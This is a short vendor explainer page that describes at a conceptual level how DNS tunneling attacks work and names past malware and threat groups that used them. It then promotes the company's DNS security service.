3min. read

What Is DNS Tunneling?

DNS tunneling is one of the most damaging DNS attacks. What exactly is it, and how does it work?

 

Domain name system, or DNS, is the protocol that translates human-friendly URLs, such as paloaltonetworks.com, into machine-friendly IP addresses, such as 199.167.52.137. Cybercriminals know that DNS is widely used and trusted. Furthermore, because DNS is not intended for data transfer, many organizations don’t monitor their DNS traffic for malicious activity. As a result, a number of types of DNS-based attacks can be effective if launched against company networks. DNS tunneling is one such attack.

How DNS Tunneling Works

DNS tunneling exploits the DNS protocol to tunnel malware and other data through a client-server model.

  1. The attacker registers a domain, such as badsite.com. The domain’s name server points to the attacker’s server, where a tunneling malware program is installed.
  2. The attacker infects a computer, which often sits behind a company’s firewall, with malware. Because DNS requests are always allowed to move in and out of the firewall, the infected computer is allowed to send a query to the DNS resolver. The DNS resolver is a server that relays requests for IP addresses to root and top-level domain servers.
  3. The DNS resolver routes the query to the attacker’s command-and-control server, where the tunneling program is installed. A connection is now established between the victim and the attacker through the DNS resolver. This tunnel can be used to exfiltrate data or for other malicious purposes. Because there is no direct connection between the attacker and victim, it is more difficult to trace the attacker’s computer.

DNS tunneling has been around for almost 20 years. Both the Morto and Feederbot malware have been used for DNS tunneling. Recent tunneling attacks include those from the threat group DarkHydrus, which targeted government entities in the Middle East in 2018, and OilRig, which has been operating since 2016 and is still active.

How do you stop attackers from using DNS against you? Read our white paper to learn the steps you can take to stop DNS attacks.

Related content


What Is DNS?

The domain name system (DNS) is a naming database which locates internet domain names and translates them into Internet Protocol (IP) addresses.

Secure Your Domain Name System

See the top DNS-Based attacks you should know about

Learn how Palo Alto Networks DNS Security service protects your organization from the latest and most sophisticated DNS-layer threats.

Learn More About DNS Attacks

See Palo Alto Networks DNS Security

DNS Security uses inline deep learning to provide 40% more DNS-layer threat coverage and disrupt 85% of malware that abuses DNS for malicious activity.

Disrupt DNS-layer Threats

Protect your DNS traffic against threats

Get insight into how to regain control of your DNS traffic and learn best practicies to to stop threat actors from using DNS to attack your organization.

Stop DNS Threats